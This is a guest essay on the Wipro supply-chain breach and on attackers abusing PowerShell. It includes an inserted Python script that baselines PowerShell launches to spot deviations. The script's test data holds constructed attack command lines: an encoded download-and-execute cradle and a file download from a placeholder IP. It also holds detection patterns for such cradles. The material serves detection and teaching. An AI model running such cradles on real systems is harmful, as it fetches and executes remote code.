GUEST ESSAY: How stealth, persistence allowed Wipro attacker to plunder supply chain

By Chris Gerritz

The recent network breach of Wipro, a prominent outsourcing company based in India, serves as a stunning reminder that digital transformation cuts two ways.

Our rising dependence on business systems that leverage cloud services and the gig economy to accomplish high-velocity innovation has led to a rise in productivity. However, the flip side is that we’ve also created fresh attack vectors at a rapid rate – exposures that are not being adequately addressed.

Related: Marriott suffers massive breach

We now know, thanks to reporting from cybersecurity blogger Brian Krebs, that the Wipro hack was a multi-month intrusion and likely the work of a nation-state backed threat actor. What’s more, the attackers reportedly were able to use Wipro as a jumping off point to infiltrate the networks of at least a dozen of Wipro’s customers.

Wipro issued a media statement to The Economic Times acknowledging “potentially abnormal activity in a few employee accounts on our network due to an advanced phishing campaign . . . Upon learning of the incident, we promptly began an investigation, identified the affected users and took remedial steps to contain and mitigate any potential impact.”

Wipro did not provide many additional details. However, one has to wonder whether, beyond its customers, any of Wipro’s subsidiaries or supply-chain partners were targeted and successfully breached, as well.

Persistence pays off


Many businesses still believe the worst attack they can suffer is a near-instantaneous loss, such as computers being locked or disabled for ransom. While ransomware attacks can cause material damage, another type of attack enterprises need to consider is the ‘silent’ attack, like the one Wipro and its customers experienced.

Silent, long-term attacks can remain hidden for months, even years, without being identified. These attacks can inflict a tremendous amount of harm if not detected and remediated. From the attacker’s point of view, a deep, persistent incursion results in numerous benefits. The intruder is able to:

• Use the compromised network to attack customers and partners

• Steal intellectual property

• Monitor competitive and operational business information

• Share access with someone else willing to pay for it

• Set the stage for a future cyber attack

The Wipro attack highlights the urgency for organizations to take steps to incorporate proactive and responsive elements within their security strategy, beyond the core prevention tools and controls like firewalls and traditional AV.

Borrowing tools

It would not surprise me if this attacker, once inside Wipro’s network, used tactics and techniques that have come into everyday use in advanced persistent threat (APT) types of hacks. One such go-to APT technique is to remotely leverage legit administrative tools to carry out malicious activities — under cover.

For instance, PowerShell is a command-line shell and scripting language that ships with every Microsoft Windows system, and administrators rely on it to automate tasks and manage configurations across many endpoints and servers. Because it is already present and trusted, PowerShell is commonly used in APT hacks to run payloads and move laterally, while hiding within the noise of normal day-to-day administrative activity.

Unfortunately, at the moment there is no generic defense a vendor can sell a company to stop this type of threat, because the tool being abused is the same one the business depends on. The Wipro hack underscores why companies need to continually audit how built-in tools like PowerShell, and numerous others, are actually used in their environment: who runs them, from which hosts, launched by which parent processes, and with what arguments. PowerShell script block logging and process-creation auditing with command lines provide that telemetry. The goal should be for organizations to understand what ‘normal’ is in their network and to be able to accurately and swiftly identify deviations from that normal baseline.
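As an added example (not the essayist's or Infocyte's code), the Python sketch below shows the baseline-and-deviation approach applied to PowerShell launches. It learns which host/user pairs and which parent processes normally start PowerShell from a constructed window assumed to be clean, then scores observed launches for deviations from that baseline and for content indicators: an -EncodedCommand payload (which it decodes, since PowerShell expects base64 of UTF-16LE text), a download cradle, and hidden-window or no-profile switches. All host names, accounts, command lines and the 203.0.113.10 address are constructed for illustration; the record fields correspond to what a Windows process-creation event (Security event 4688 with command-line auditing enabled) or an EDR sensor records. Note that the SCCM launch using -ExecutionPolicy Bypass is not flagged, because that host, account and parent are part of the baseline; a bare keyword match would have produced a false positive there.

```python
"""Baseline-and-deviation check for PowerShell process launches (added example)."""
import base64
import re
from collections import defaultdict

# Constructed baseline window: PowerShell launches from a period assumed clean.
BASELINE = [
    {"host": "WS-ADM01", "user": "CORP\\itadmin", "parent": "explorer.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\patch-status.ps1"},
    {"host": "WS-ADM01", "user": "CORP\\itadmin", "parent": "cmd.exe",
     "cmdline": "powershell.exe Get-Service -Name Spooler"},
    {"host": "SRV-SCCM01", "user": "CORP\\svc_sccm", "parent": "CcmExec.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Windows\\ccmcache\\a1\\inv.ps1"},
]

# Constructed payload: a download cradle hidden the way -EncodedCommand carries it
# (base64 of UTF-16LE text). 203.0.113.10 is a documentation-only address.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed observation window: one routine launch and two that deviate.
OBSERVED = [
    {"host": "SRV-SCCM01", "user": "CORP\\svc_sccm", "parent": "CcmExec.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Windows\\ccmcache\\a2\\inv.ps1"},
    {"host": "WS-FIN07", "user": "CORP\\jdoe", "parent": "WINWORD.EXE",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"host": "WS-ADM01", "user": "CORP\\itadmin", "parent": "cmd.exe",
     "cmdline": "powershell.exe -c \"Invoke-WebRequest http://203.0.113.10/t.exe -OutFile C:\\Users\\Public\\t.exe\""},
]

# -e / -enc / -EncodedCommand followed by a base64 run (PowerShell accepts prefixes).
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression",
    re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)


def build_baseline(records):
    """Learn which users and which parent processes launch PowerShell on each host."""
    users = defaultdict(set)
    parents = defaultdict(set)
    for r in records:
        users[r["host"]].add(r["user"].lower())
        parents[r["host"]].add(r["parent"].lower())
    return {"users": users, "parents": parents}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_launch(record, baseline):
    """Return the reasons a launch deviates from the baseline or carries suspicious content."""
    reasons = []
    host = record["host"]
    if record["user"].lower() not in baseline["users"].get(host, set()):
        reasons.append("user not seen running PowerShell on this host")
    if record["parent"].lower() not in baseline["parents"].get(host, set()):
        reasons.append(f"unusual parent process {record['parent']}")
    text = record["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded command")
        text = text + " " + decoded  # inspect the decoded payload as well
    if CRADLE_RE.search(text):
        reasons.append("download cradle")
    if HIDDEN_RE.search(text):
        reasons.append("hidden window / no profile")
    return reasons


def triage(observed, baseline_records):
    """Map each observed record's index to its list of deviation reasons (empty = baseline)."""
    baseline = build_baseline(baseline_records)
    return {i: score_launch(r, baseline) for i, r in enumerate(observed)}


if __name__ == "__main__":
    for idx, reasons in triage(OBSERVED, BASELINE).items():
        r = OBSERVED[idx]
        verdict = "REVIEW" if reasons else "baseline"
        print(f"{verdict:8} {r['host']} {r['user']} <- {r['parent']}: {'; '.join(reasons) or '-'}")
```

In practice the baseline would be built from weeks of real telemetry rather than three records, and the content patterns would be only one input among several; the structural point is that the same command line is benign on one host and alarming on another, so the detection has to be anchored to what is normal for that host and account.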

Outside reports like Krebs’s are often the key to finding a long-term, persistent compromise within a network. Discovering that your data is out there, in public or in the digital underground, tends to be the moment a victim recognizes the data as their own and realizes they were the one breached. When that happens, a proactive effort to find the source of the breach must begin immediately, with the goal of locating and stopping the intruder rather than only cleaning up the symptom.

About the essayist: Chris Gerritz is the co-founder and CPO of Infocyte, a pioneer in forensics-based proactive cyber threat detection and instant incident response.
